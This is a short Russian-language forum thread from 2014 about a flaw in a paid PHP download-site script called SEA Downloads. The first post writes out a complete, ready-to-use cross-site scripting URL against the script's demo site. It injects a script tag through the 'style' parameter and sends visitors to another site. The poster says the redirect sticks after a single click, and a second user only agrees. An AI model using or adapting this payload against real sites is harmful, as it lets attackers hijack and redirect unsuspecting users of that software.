Уязвимость SEA Downoloads

Печать / RSS
0
1. VITAMIN 08.12.2014 / 14:28
Пришелец
Собственно платный движек:
http://wapinet.ru/buy_php_scripts
Пример:
http://sea.wapinet.ru/

Уязвимость:
http://sea.wapinet.ru/?url=somebody.com&style=sea.wapinet.ru/style/style.css"><script>location.href="//visavi.net";</script>

Если хотя бы раз подключить юзера к этому линку,то при переходе на
http://sea.wapinet.ru
его будет бросать на http://visavi.net ).gif
0
2. Влад 08.12.2014 / 15:00
Пацак
Точняк
Для выполнения действия необходимо авторизоваться!
Стикеры / Теги / Правила / Топ тем / Топ тем / Поиск